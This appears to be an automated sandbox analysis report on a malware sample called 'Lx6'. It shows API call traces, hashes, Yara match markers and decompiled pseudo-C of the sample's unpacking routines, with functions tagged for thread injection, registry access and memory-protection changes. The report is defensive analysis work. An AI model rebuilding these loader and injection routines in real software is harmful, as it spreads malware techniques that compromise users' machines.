WaitForSingleObject.KERNEL32(00000064), ref: 0076DB0B
SuspendThread.KERNEL32(?), ref: 0076DB1E

Part of subcall function 0075DE3C: memset.NTDLL ref: 0075E0E9

ResumeThread.KERNEL32(?), ref: 0076DBA0

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
String ID:
API String ID: 2397206891-0
Opcode ID: 306da8332229730fc838352087d15021ffa7305d0dfa95b725185c07af5a2897
Instruction ID: 3bf1f9bfd7544e8e2da2e7a52d995861b28dd3d3bb402cef592c11e44a0de2b1
Opcode Fuzzy Hash: 306da8332229730fc838352087d15021ffa7305d0dfa95b725185c07af5a2897
Instruction Fuzzy Hash: F441BDB2A00209EFDB21AF94CC89EEE7BBAEF04350F144465FD0AA6150C778DE95DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00401B3C Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401B3C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E004012CE(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x404184 + 0x405014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x404184 + 0x405151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E00401E0B(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x404184 + 0x405161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x404184 + 0x405174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x404184 + 0x405189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x404184 + 0x40519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E004015CB(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00401b4a
0x00401b4e
0x00401c0f
0x00401b54
0x00401b6c
0x00401b7b
0x00401b82
0x00401b84
0x00401b89
0x00401c07
0x00401c08
0x00401b8b
0x00401b98
0x00401b9a
0x00401b9f
0x00000000
0x00401ba1
0x00401bae
0x00401bb0
0x00401bb5
0x00000000
0x00401bb7
0x00401bc4
0x00401bc6
0x00401bcb
0x00000000
0x00401bcd
0x00401bda
0x00401bdc
0x00401be1
0x00000000
0x00401be3
0x00401be9
0x00401bef
0x00401bf4
0x00401bf9
0x00401bfe
0x00000000
0x00401c00
0x00401c03
0x00401c03
0x00401bfe
0x00401be1
0x00401bcb
0x00401bb5
0x00401b9f
0x00401b89
0x00401c1d

APIs

Part of subcall function 004012CE: HeapAlloc.KERNEL32(00000000,?,0040169A,00000030,?,00000000), ref: 004012DA

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401F85,?,?,?,?,?,00000002,?,?), ref: 00401B60
GetProcAddress.KERNEL32(00000000,?), ref: 00401B82
GetProcAddress.KERNEL32(00000000,?), ref: 00401B98
GetProcAddress.KERNEL32(00000000,?), ref: 00401BAE
GetProcAddress.KERNEL32(00000000,?), ref: 00401BC4
GetProcAddress.KERNEL32(00000000,?), ref: 00401BDA

Part of subcall function 004015CB: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401628
Part of subcall function 004015CB: memset.NTDLL ref: 0040164A

Memory Dump Source

Source File: 00000000.00000002.496058515.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.496020700.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496068804.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496077898.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496085963.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Lx6.jbxd

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 5c0b5bac94cd1d8710dc572b8836c5ca50322d4c9d5cba693934b18ef1a15d6c
Instruction ID: 3b4bd2386e98a258a88a34adc7bbdbc20939a64a3b205c49042e137ae9ba08d5
Opcode Fuzzy Hash: 5c0b5bac94cd1d8710dc572b8836c5ca50322d4c9d5cba693934b18ef1a15d6c
Instruction Fuzzy Hash: DE213CB060074AAFE721DF69CD44D6B77ECEB44318700447AE945EB261EB74E900CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00762DF0 Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00000000,?,00778194,0075678D), ref: 00762E07
QueueUserAPC.KERNEL32(?,00000000,?), ref: 00762E1C
GetLastError.KERNEL32(00000000), ref: 00762E27
TerminateThread.KERNEL32(00000000,00000000), ref: 00762E31
CloseHandle.KERNEL32(00000000), ref: 00762E38
SetLastError.KERNEL32(00000000), ref: 00762E41

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: d32704588112bc0000d5194f97962203ded3504b84aa62d0461d2956d4b03682
Instruction ID: a25ddb0d65a511bde6d48d5056ae7f0d7ff7f6ab5a09d0c68138f04623697713
Opcode Fuzzy Hash: d32704588112bc0000d5194f97962203ded3504b84aa62d0461d2956d4b03682
Instruction Fuzzy Hash: D1F01232245624FBD6225B64AC0CF5BBB69FB09BD2F008414F60991170C72D4A95EB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0075DCFB Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0076F514: RegCreateKeyA.ADVAPI32(80000001,03F0B7F0,03F0C314), ref: 0076F529
Part of subcall function 0076F514: lstrlen.KERNEL32(03F0B7F0,00000000,00000000,0077706E,?,?,?,007632F0,00000001,00000000,03F0C314), ref: 0076F552

RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,00000001,00000000,00000000,?,74715520,00000000,?,?,?,0075508A,?), ref: 0075DD33
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0075DD47
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00000001,?,?,?,0075508A,?,?,?,?,?,00000001), ref: 0075DD61
HeapFree.KERNEL32(00000000,00000001,?,?,?,0075508A,?,?,?,?,?,00000001), ref: 0075DD7D
RegCloseKey.KERNEL32(?,?,?,?,0075508A,?,?,?,?,?,00000001), ref: 0075DD8B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
String ID:
API String ID: 1633053242-0
Opcode ID: 6618b15bf5d5e9208392727d76950310db99a8c4bea2e7ba33f8c409c543d6e6
Instruction ID: 0d3d14422244178a59803128e4f2445d5aaea6adcd5d3f610fa5bc60b77fe73e
Opcode Fuzzy Hash: 6618b15bf5d5e9208392727d76950310db99a8c4bea2e7ba33f8c409c543d6e6
Instruction Fuzzy Hash: 77114CB2600249FFDF119F94DC88CEE7B7EFB48395B104426F90593120D6759E54DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00401AF6 Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x404160 = _t1;
				if(_t1 != 0) {
					 *0x404170 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E00401673(); // executed
					_t6 = _t4; // executed
					HeapDestroy( *0x404160); // executed
				}
				ExitProcess(_t6);
			}

0x00401af7
0x00401b00
0x00401b06
0x00401b0d
0x00401b16
0x00401b1b
0x00401b21
0x00401b2c
0x00401b2e
0x00401b2e
0x00401b35

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00401B00
GetModuleHandleA.KERNEL32(00000000), ref: 00401B10
GetCommandLineW.KERNEL32 ref: 00401B1B

Part of subcall function 00401673: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004016A8
Part of subcall function 00401673: Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 004016EF
Part of subcall function 00401673: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004,?,00000000), ref: 00401717
Part of subcall function 00401673: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401721
Part of subcall function 00401673: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401734
Part of subcall function 00401673: GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401761
Part of subcall function 00401673: GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0040177F

HeapDestroy.KERNELBASE ref: 00401B2E
ExitProcess.KERNEL32 ref: 00401B35

Memory Dump Source

Source File: 00000000.00000002.496058515.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.496020700.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496068804.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496077898.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496085963.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Lx6.jbxd

Similarity

API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
String ID:
API String ID: 1863574965-0
Opcode ID: ffe8522a33ae1d9a0338250a3b4db95b233782b7117675cd44a9e6d1b4a84028
Instruction ID: 09b8876d7a37993e9ad270813e63f7240fbcbfdfafa5698b900f44739490cd05
Opcode Fuzzy Hash: ffe8522a33ae1d9a0338250a3b4db95b233782b7117675cd44a9e6d1b4a84028
Instruction Fuzzy Hash: DAE0B6B0403220ABC3216F71BE0CA4A7E28BB597567000536F501F2274DB388A418AAC

Uniqueness

Uniqueness Score: -1.00%

Function 0075E958 Relevance: 6.1, APIs: 4, Instructions: 108threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0075E986
ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0075EA10
WaitForSingleObject.KERNEL32(00000064), ref: 0075EA1E
SuspendThread.KERNEL32(?), ref: 0075EA31

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Thread$ObjectResumeSingleSuspendWaitmemset
String ID:
API String ID: 3168247402-0
Opcode ID: a2f8a90fbcdbf8905bd00c383d11b40f0d48f89e9b8ddf6e4b6b8b8b75f3b597
Instruction ID: 19f6d52472e9b943d87dbcd58a16ae4700b505b83d6172ee9197e05087a718ae
Opcode Fuzzy Hash: a2f8a90fbcdbf8905bd00c383d11b40f0d48f89e9b8ddf6e4b6b8b8b75f3b597
Instruction Fuzzy Hash: 3B418E72108341EFE721DF60CC45EAABBEAFF88345F10892DFA9491160D775DA58CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00764546 Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,00000000,00000010,00000000,?,?,?,?,007614CA,80000001,?,00000000,00000010), ref: 0076456B
RtlAllocateHeap.NTDLL(00000000,00000010,00000000), ref: 00764582
HeapFree.KERNEL32(00000000,00000000,?,007614CA,80000001,?,00000000,00000010,?,0076E512,80000001,?,00000000,?,?,0075DA8B), ref: 0076459D
RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,00000000,00000010,?,007614CA,80000001,?,00000000,00000010,?,0076E512,80000001), ref: 007645BC

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: HeapQueryValue$AllocateFree
String ID:
API String ID: 4267586637-0
Opcode ID: 85f560a5aa498a38836fd90f5a0875dd263cfc2e0ab9c319160ae30e62ba0da4
Instruction ID: b1e727c3da790bd4fd25be6efa9d690757be9b1f206e8409b8b0ef0c2e592566
Opcode Fuzzy Hash: 85f560a5aa498a38836fd90f5a0875dd263cfc2e0ab9c319160ae30e62ba0da4
Instruction Fuzzy Hash: 4D113AB6500118FFDB129F94DC84CEEBBBDEB89750B108066FD06A2120D2755F90EB60

Uniqueness

Uniqueness Score: -1.00%

Function 0076D45A Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,00778190,00000000,007633DE,?,00754074,?), ref: 0076D479
PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,00778190,00000000,007633DE,?,00754074,?), ref: 0076D484
_wcsupr.NTDLL ref: 0076D491
lstrlenW.KERNEL32(00000000), ref: 0076D499

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
String ID:
API String ID: 2533608484-0
Opcode ID: 3f014385fd68cbdc59df6c3f081099c40f0af2a2fbccfb05114a52a797700889
Instruction ID: 85947a87a5226b75b5f2aba2fe91863711776025eb747e482c24685e768bb183
Opcode Fuzzy Hash: 3f014385fd68cbdc59df6c3f081099c40f0af2a2fbccfb05114a52a797700889
Instruction Fuzzy Hash: 00F05932701210AF93226BB09CCDE6B5A9DAF91B927108028FC09C2051CEBCDC4182A5

Uniqueness

Uniqueness Score: -1.00%

Function 00761CA7 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00761CC6

Part of subcall function 0076D547: RtlEnterCriticalSection.NTDLL(00000000), ref: 0076D553
Part of subcall function 0076D547: CloseHandle.KERNEL32(?), ref: 0076D561
Part of subcall function 0076D547: RtlLeaveCriticalSection.NTDLL(00000000), ref: 0076D57D

FindCloseChangeNotification.KERNEL32(?), ref: 00761CD4
InterlockedDecrement.KERNEL32(0077807C), ref: 00761CE3

Part of subcall function 00757FAB: SetEvent.KERNEL32(0000053C,00761CFE), ref: 00757FB5
Part of subcall function 00757FAB: CloseHandle.KERNEL32(0000053C), ref: 00757FCA
Part of subcall function 00757FAB: HeapDestroy.KERNELBASE(03B10000), ref: 00757FDA

RtlExitUserThread.NTDLL(00000000), ref: 00761CFF

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Close$CriticalHandleSection$ChangeDecrementDestroyEnterEventExitFindHeapInterlockedLeaveMultipleNotificationObjectsThreadUserWait
String ID:
API String ID: 2993087875-0
Opcode ID: fd45ac6a2297ae0910ef5d354c6849c9eca3058ceb2499900e1ad32b9a652df6
Instruction ID: 71056cbfa634429cfede928b2551cd601c08f6f147171d126e02172bcbc334eb
Opcode Fuzzy Hash: fd45ac6a2297ae0910ef5d354c6849c9eca3058ceb2499900e1ad32b9a652df6
Instruction Fuzzy Hash: 3CF0A430640204BFC7015F68DC0DE693769EB417B1B554228F91A832D0DF7C8946CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040141E Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040141E(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t84;
				intOrPtr _t85;

				_t84 =  *0x404170;
				_t46 = E00401A72(_t84,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t85 = _t84 + _v24;
					_v40 = _t85;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x404180;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t85;
							_t13 = _t68 + 0x4051a7; // 0x4051a7
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t85;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E00401129(_v12 + _t57, _v12, _v52 - _v8 + _v48 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x404180 = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							L00401FED(_v40);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}

0x00401425
0x00401435
0x0040143a
0x0040143f
0x00401454
0x0040145b
0x00401460
0x00401471
0x00401474
0x0040147a
0x0040147f
0x0040152f
0x00401485
0x00401485
0x0040148b
0x004014fa
0x0040148d
0x0040148d
0x00401490
0x00401492
0x0040149a
0x0040149d
0x004014a0
0x004014a8
0x004014b3
0x004014b4
0x004014b5
0x004014d2
0x004014e0
0x004014e7
0x004014ea
0x004014ed
0x004014f5
0x00000000
0x00000000
0x004014a5
0x004014a5
0x004014f7
0x00401504
0x00401516
0x00401506
0x0040150f
0x0040150f
0x00401527
0x00401527
0x00401536
0x0040153c

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000030,00000000,?,00000000,?,?,?,?,?,?,004016E8,00000000), ref: 00401474
VirtualFree.KERNELBASE(004016E8,00000000,00008000,?,?,?,?,?,?,004016E8,00000000), ref: 00401527

Strings

Jul 26 2022, xrefs: 004014AB

Memory Dump Source

Source File: 00000000.00000002.496058515.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.496020700.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496068804.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496077898.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496085963.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Lx6.jbxd

Similarity

API ID: Virtual$AllocFree
String ID: Jul 26 2022
API String ID: 2087232378-2077294905
Opcode ID: fb411f02df271f7e3f0bd6ca07b5d9e9a6a02f9c8f3ef8dea46418241c2b36c2
Instruction ID: 5389cfaf20e1cd92de493fed3f51700444e3648ae1cc7c6b09015de4d6e02e93
Opcode Fuzzy Hash: fb411f02df271f7e3f0bd6ca07b5d9e9a6a02f9c8f3ef8dea46418241c2b36c2
Instruction Fuzzy Hash: BF313275D00219EFDB01CF98DD80BAEB7B8FF54304F10416AE905BB291D775AA06CB58

Uniqueness

Uniqueness Score: -1.00%

Function 007632BD Relevance: 4.6, APIs: 3, Instructions: 81registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0076F514: RegCreateKeyA.ADVAPI32(80000001,03F0B7F0,03F0C314), ref: 0076F529
Part of subcall function 0076F514: lstrlen.KERNEL32(03F0B7F0,00000000,00000000,0077706E,?,?,?,007632F0,00000001,00000000,03F0C314), ref: 0076F552

RegQueryValueExA.KERNEL32(00000000,00000000,00000000,775EC740,00777068,0076C4FB,00000001,00000000,03F0C314,0077706E,00000000,775EC740,0076EF5B,03F0C314,00000000,00000000), ref: 00763311
RegSetValueExA.KERNEL32(00777068,00000003,00000000,00000003,00777068,00000028), ref: 00763352
RegCloseKey.ADVAPI32(?), ref: 0076335E

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Value$CloseCreateQuerylstrlen
String ID:
API String ID: 2552977122-0
Opcode ID: 868e280e314c664309bb6b746493b3bb75bd0e854fb7b22e4e44c9ec5bd639bf
Instruction ID: 826f9f5969aca6c369f442f5394efdbd51d123d77a0281f6d69c145e8405c84a
Opcode Fuzzy Hash: 868e280e314c664309bb6b746493b3bb75bd0e854fb7b22e4e44c9ec5bd639bf
Instruction Fuzzy Hash: 7B314971D40218EFDB61DF95DC489AEBBB8FB047A4F10806AE809A2260D7384E84CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0076144E Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007549F2: lstrlen.KERNEL32(?,00000000,?,00000027), ref: 00754A28
Part of subcall function 007549F2: lstrcpy.KERNEL32(00000000,00000000), ref: 00754A4C
Part of subcall function 007549F2: lstrcat.KERNEL32(00000000,00000000), ref: 00754A54

RegOpenKeyExA.KERNEL32(0076E512,00000000,00000000,00020119,80000001,00000000,?,00000000,?,0076E512,80000001,?,00000000,?,?,0075DA8B), ref: 00761495
RegOpenKeyExA.ADVAPI32(0076E512,0076E512,00000000,00020019,80000001,?,0076E512,80000001,?,00000000,?,?,0075DA8B,?,?,?), ref: 007614AB
RegCloseKey.ADVAPI32(80000001,80000001,?,00000000,00000010,?,0076E512,80000001,?,00000000,?,?,0075DA8B,?,?,?), ref: 007614F4

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Open$Closelstrcatlstrcpylstrlen
String ID:
API String ID: 4131162436-0
Opcode ID: 4c7d6a54126bf2aacd7a1ea6adebcc99567c039332f9fe92963bfbfcfd7c8654
Instruction ID: 31bf0a28862f4d948a7c6c4cd840e9632067b39964a0b162a7c8aff86174b3d3
Opcode Fuzzy Hash: 4c7d6a54126bf2aacd7a1ea6adebcc99567c039332f9fe92963bfbfcfd7c8654
Instruction Fuzzy Hash: 04216F7190024DBFCB00DF94DC89CAEBFBCEB44354B5440A9FA06A7221D7389E55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0075C2B8 Relevance: 4.6, APIs: 3, Instructions: 71memorythreadCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 0075C2E9
RtlExitUserThread.NTDLL(00000000), ref: 0075C2FC
HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 0075C396

Part of subcall function 0076A4E7: lstrlen.KERNEL32(0075C1CF,00000000,?,00000000,?,0076AC04,?,0075C1CF,00000000), ref: 0076A4FD
Part of subcall function 0076A4E7: lstrlen.KERNEL32(?,?,0076AC04,?,0075C1CF,00000000), ref: 0076A504
Part of subcall function 0076A4E7: RtlAllocateHeap.NTDLL(00000000,00000029), ref: 0076A512
Part of subcall function 0076A4E7: wsprintfA.USER32 ref: 0076A534
Part of subcall function 0076A4E7: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 0076A565

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Free$lstrlen$AllocateExitThreadUserwsprintf
String ID:
API String ID: 986524773-0
Opcode ID: e004f0eeb2ebfc5c7733ff03f89c4b76c8d358b7bf9075eb7d92f6ecc96fef36
Instruction ID: 851fe3c4247a457456e2b0d1d0ebe7cdb3ede0e50c20b353257758230ae329d2
Opcode Fuzzy Hash: e004f0eeb2ebfc5c7733ff03f89c4b76c8d358b7bf9075eb7d92f6ecc96fef36
Instruction Fuzzy Hash: 6A212731200204FFD7119B58DC49FEB7BB9EB45361F008169F50993260DBB8AD49CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040133C Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040133C(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x404180;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}

0x00401346
0x00401353
0x00401359
0x00401365
0x00401375
0x00401377
0x0040137f
0x00401414
0x0040141b
0x00000000
0x00000000
0x00000000
0x00401385
0x00401385
0x00401385
0x00401389
0x00000000
0x00000000
0x00401395
0x00401399
0x004013bd
0x004013c1
0x004013d5
0x004013d5
0x004013db
0x004013ea
0x004013ee
0x004013f6
0x004013f6
0x004013fe
0x00401401
0x0040140e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040140e
0x004013c9
0x004013cd
0x004013d3
0x00000000
0x00000000
0x00000000
0x004013d3
0x004013a1
0x004013a5
0x004013af
0x004013a7
0x004013a7
0x004013a7
0x00000000
0x004013a5
0x00000000

APIs

VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401375
VirtualProtect.KERNEL32(00000000,?,?,?), ref: 004013EA
GetLastError.KERNEL32 ref: 004013F0

Memory Dump Source

Source File: 00000000.00000002.496058515.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.496020700.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496068804.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
